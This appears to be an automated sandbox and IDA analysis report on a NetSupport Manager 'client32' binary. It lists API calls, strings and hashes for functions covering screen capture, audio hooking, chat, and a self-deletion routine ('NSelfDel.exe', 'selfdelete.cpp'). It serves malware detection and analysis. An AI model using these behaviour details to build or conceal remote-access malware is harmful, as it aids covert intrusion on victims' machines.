Opcode Fuzzy Hash: 8f26ef6fd018574ad29966309b08038d9b6a407cfa2a3251d72f04733a0025b5
Instruction Fuzzy Hash: 5F014F36A0010DABC710DFA8C941FAFB7B8DF99704F114059AD45AB280DAB1AE14D7A1

Function 111681A3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

__waccess_s.LIBCMT ref: 111681AE

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __waccess_s
String ID:
API String ID: 4272103461-0
Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540

Function 11164EAD Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 11164EBA

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585

Function 00AA1000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

_NSMClient32@8.PCICL32(?,?,?,00AA10A2,00000000), ref: 00AA100B

Memory Dump Source

Source File: 00000004.00000002.670583223.0000000000AA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000004.00000002.670578615.0000000000AA0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_aa0000_client32.jbxd

Yara matches

Similarity

API ID: Client32@8
String ID:
API String ID: 433899448-0
Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
Instruction ID: 0230f4e93616b68af4eede61581d253b1fc29999f90b08c179267234ca86f700
Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
Instruction Fuzzy Hash: 77B092B211434DAB8714EE98E941C7B339CAA98600F040809BD0543282CA61FC609671

Function 1116C488 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,11178B2B,111F29D8,00000314,00000000,?,?,?,?,?,1116E7EB,111F29D8,Microsoft Visual C++ Runtime Library,00012010), ref: 1116C48A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
Instruction ID: 85178daedb8e135e59ea49443ffa37c172a2f839626d84bfb77205dd36a12bfe
Opcode Fuzzy Hash: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
Instruction Fuzzy Hash:

Non-executed Functions

Function 110077A0 Relevance: 86.3, APIs: 35, Strings: 14, Instructions: 548windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11088BE0: IsWindow.USER32(111314CC), ref: 11088BFC
Part of subcall function 11088BE0: IsWindow.USER32(?), ref: 11088C16

LoadCursorA.USER32(00000000,00007F02,?,B24479DC), ref: 110077EA
SetCursor.USER32(00000000), ref: 110077F1
GetDC.USER32(?), ref: 1100781D
CreateCompatibleDC.GDI32(00000000), ref: 1100782A
CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007934
SelectObject.GDI32(?,00000000), ref: 11007942
CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007956
CreateCompatibleDC.GDI32(00000000), ref: 11007963
CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007975
SelectClipRgn.GDI32(?,00000000), ref: 110079A1

Part of subcall function 110022D0: DeleteObject.GDI32(?), ref: 110022E1
Part of subcall function 110022D0: CreatePen.GDI32(?,?,?), ref: 11002308

Part of subcall function 11005B70: CreateSolidBrush.GDI32(?), ref: 11005B97

BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110079CB
SelectClipRgn.GDI32(?,00000000), ref: 110079E0
DeleteObject.GDI32(00000000), ref: 110079ED
DeleteDC.GDI32(?), ref: 110079FA
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007A17
ReleaseDC.USER32(?,?), ref: 11007A46
CreatePen.GDI32(00000002,00000001,00000000), ref: 11007A51
CreateSolidBrush.GDI32(?), ref: 11007B42
GetSysColor.USER32(00000004), ref: 11007B50
LoadBitmapA.USER32(00000000,00002EEF,00FF00FF,00000000), ref: 11007B67

Part of subcall function 11142F40: GetObjectA.GDI32(11003D76,00000018,?), ref: 11142F53
Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F61
Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F66
Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F7E
Part of subcall function 11142F40: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11142F91
Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F9C
Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11142FA6
Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11142FC3
Part of subcall function 11142F40: SetBkColor.GDI32(00000000,00000000), ref: 11142FCC
Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142FD8
Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142FF5
Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11143000
Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00000000), ref: 11143009
Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11143026
Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11143031

Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
Part of subcall function 11110230: _memset.LIBCMT ref: 11110262

_memset.LIBCMT ref: 11007BC7
_swscanf.LIBCMT ref: 11007C34

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

CreateFontIndirectA.GDI32(?), ref: 11007C65
_memset.LIBCMT ref: 11007C8C
GetStockObject.GDI32(00000011), ref: 11007C9F
GetObjectA.GDI32(00000000), ref: 11007CA6
CreateFontIndirectA.GDI32(?), ref: 11007CB3
GetWindowRect.USER32(?,?), ref: 11007DF6
SetWindowTextA.USER32(?,00000000), ref: 11007E33
GetSystemMetrics.USER32(00000001), ref: 11007E53
GetSystemMetrics.USER32(00000000), ref: 11007E70
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007EC0
SelectObject.GDI32(?,00000000), ref: 11007986

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 1109599E
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959A7
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959AE
Part of subcall function 11095990: GetSystemMetrics.USER32(00000000,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959B7
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959BD
Part of subcall function 11095990: GetSystemMetrics.USER32(00000001,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959C5

UpdateWindow.USER32 ref: 11007EF2
SetCursor.USER32(?), ref: 11007EFF

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11007807, 11007A29, 11007DD9, 11007E1C, 11007E9A, 11007EDC
m_hWnd, xrefs: 1100780C, 11007A2E, 11007DDE, 11007E21, 11007E9F, 11007EE1
ShowAppIds, xrefs: 110078EA
FillStyle, xrefs: 11007AEC
PenWidth, xrefs: 11007A9E
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s, xrefs: 11007C2E
DISPLAY, xrefs: 1100794E
FillColour, xrefs: 11007AD6
Tool, xrefs: 11007A6A
Show, xrefs: 1100785C, 110078EF
Font, xrefs: 11007BA1
PenColour, xrefs: 11007A82
Monitor, xrefs: 11007857
Annotate, xrefs: 11007A6F, 11007A87, 11007AB2, 11007ADB, 11007AFA, 11007BA6

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2635354838-2303488826
Opcode ID: 62b4cc95cd42d10d0f63fe7ea1f9047839fc38052153163d95b1438e3f3c858e
Instruction ID: 6182bcd3debcd054039c16ce38c58758ae1f5640e4e16b95df98d0b4ae7a1d43
Opcode Fuzzy Hash: 62b4cc95cd42d10d0f63fe7ea1f9047839fc38052153163d95b1438e3f3c858e
Instruction Fuzzy Hash: 5422C7B5A00719AFE714CFA4CC85FEAF7B8FB48708F0045A9E26A97684D774A940CF50

Function 111273E0 Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 289fileprocessthreadCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11127400
_memset.LIBCMT ref: 1112741D
GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
GetTempPathA.KERNEL32(00000104,?), ref: 11127455
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
_strrchr.LIBCMT ref: 111274AA
CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000), ref: 111274E3
WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000), ref: 1112750F
CloseHandle.KERNEL32(00000000), ref: 1112751C
CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000), ref: 11127537
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
wsprintfA.USER32 ref: 11127561
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
CloseHandle.KERNEL32(?), ref: 1112759E
CloseHandle.KERNEL32(?), ref: 111275A7
CloseHandle.KERNEL32(00000000), ref: 111275AA
CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?), ref: 111275E0
GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
DuplicateHandle.KERNEL32 ref: 11127688
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
_strrchr.LIBCMT ref: 111276AB
_memmove.LIBCMT ref: 11127724
GetThreadContext.KERNEL32(?,?), ref: 11127744

Strings

pSlash, xrefs: 111276C1
D, xrefs: 11127413
*.*, xrefs: 111276E6
explorer.exe, xrefs: 111275D9
NSelfDel.exe, xrefs: 1112746A
iCodeSize <= sizeof(local.opCodes), xrefs: 1112770A
selfdelete.cpp, xrefs: 111276BC, 11127705
"%s" %d %s, xrefs: 1112755B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
API String ID: 2219718054-800295887
Opcode ID: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
Opcode Fuzzy Hash: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55

Function 1102D9F4 Relevance: 37.0, APIs: 12, Strings: 9, Instructions: 278sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0,?,?,?,?,00000003), ref: 1102DAA8

Strings

pSlash, xrefs: 1102DF34
Error %s unloading audiocap dll, xrefs: 1102DE66
Finished terminate, xrefs: 1102E0B6
Unload Hook, xrefs: 1102DAAE
Stop tracing, almost terminated, xrefs: 1102E058
Audio, xrefs: 1102DADE
CLIENT32.CPP, xrefs: 1102DF2F
HookDirectSound, xrefs: 1102DAD9
*.*, xrefs: 1102DF43

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: *.*$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Finished terminate$HookDirectSound$Stop tracing, almost terminated$Unload Hook$pSlash
API String ID: 3472027048-4043340749
Opcode ID: d0826688aa333f0d06d15d34ec1d8fe2eb0dac57578937a67a689c38747e6abe
Instruction ID: d56efc98ad72941ff424cdc5152fef311379b6c09b9f264f80b34d0be5964fb8
Opcode Fuzzy Hash: d0826688aa333f0d06d15d34ec1d8fe2eb0dac57578937a67a689c38747e6abe
Instruction Fuzzy Hash: 3EA1F274E426269FEB06DFE0CCC4F6DB7A5AB8470CF6001B8E62657288D7716D84CB52

Function 11051800 Relevance: 30.5, APIs: 7, Strings: 10, Instructions: 775windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 1105190A
GetDlgItem.USER32(?,00000454), ref: 11051997
SendMessageA.USER32(?,00000180,00000000,?,?,00000000), ref: 110519F9
SendMessageA.USER32(?,0000019A,00000000,?), ref: 11051A12
EnableWindow.USER32(00000000,00000001), ref: 11051B49

Part of subcall function 11001E20: SetFocus.USER32 ref: 11001E28

Part of subcall function 111325F0: ShowWindow.USER32(?,1103936E), ref: 11132603
Part of subcall function 111325F0: SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1113261F

Part of subcall function 11024880: _memset.LIBCMT ref: 110248A5
Part of subcall function 11024880: _strncpy.LIBCMT ref: 110248B1
Part of subcall function 11024880: _memset.LIBCMT ref: 1102492E
Part of subcall function 11024880: _strncpy.LIBCMT ref: 1102493A
Part of subcall function 11024880: IsWindow.USER32(00000000), ref: 1102494D
Part of subcall function 11024880: IsIconic.USER32(00000000), ref: 1102496B
Part of subcall function 11024880: BringWindowToTop.USER32(00000000), ref: 11024988

Part of subcall function 11021E80: _memmove.LIBCMT ref: 11021EDE

EnableWindow.USER32(00000000,00000000), ref: 11051ED2

Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,750A94D8), ref: 11145CA0
Part of subcall function 11145C70: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA

_memset.LIBCMT ref: 1105221B

Strings

RDH::CHATEX_CLOSE received, xrefs: 11051A55
Chat, xrefs: 1105208F
506013, xrefs: 11051DA8, 11051FC1, 110521AF, 11052233
Client, xrefs: 11052162
RDH::Create whiteboard object %x, ref count %d, xrefs: 11051D7F
RDH::CHATEX_INVITE received - whiteboard %x, xrefs: 11051C45
AlwaysOnTop, xrefs: 1105215D
JoinChat, xrefs: 11051EE6
WhiteBoard, xrefs: 11051CE2
RDH::Release whiteboard ref, xrefs: 11051AB9

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$_memset$_strncpy$EnableMessageSend$BringFocusIconicItemOpenShowVersion_memmove
String ID: 506013$AlwaysOnTop$Chat$Client$JoinChat$RDH::CHATEX_CLOSE received$RDH::CHATEX_INVITE received - whiteboard %x$RDH::Create whiteboard object %x, ref count %d$RDH::Release whiteboard ref$WhiteBoard
API String ID: 2416290131-1277300478
Opcode ID: 8d45e78a12a00c5eb022a385543f1e462f7b533d682a6943ba6d22e42b588453
Instruction ID: c08e69c62f27a2e742a48651e5aa9dbe60515c480b2091c2b2c36c4b254f8a5c
Opcode Fuzzy Hash: 8d45e78a12a00c5eb022a385543f1e462f7b533d682a6943ba6d22e42b588453
Instruction Fuzzy Hash: 6852C579E00705AFE790DFA4CC88B9AB7F5AF44708F1045A8E95A9B281DB74F940CF51

Function 111236E0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 329windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 11123836
FreeLibrary.KERNEL32(?,?,?), ref: 1112387B
IsIconic.USER32(?), ref: 111238C4
InvalidateRect.USER32(?,00000000,00000001), ref: 11123931

Strings

KeepAspect, xrefs: 11123A8F
View, xrefs: 11123A70, 11123A94
ScaleToFit, xrefs: 11123A6B
ignoring WM_TOUCH, xrefs: 11123844

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Iconic$FreeInvalidateLibraryRect
String ID: KeepAspect$ScaleToFit$View$ignoring WM_TOUCH
API String ID: 2857465220-3401310001
Opcode ID: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
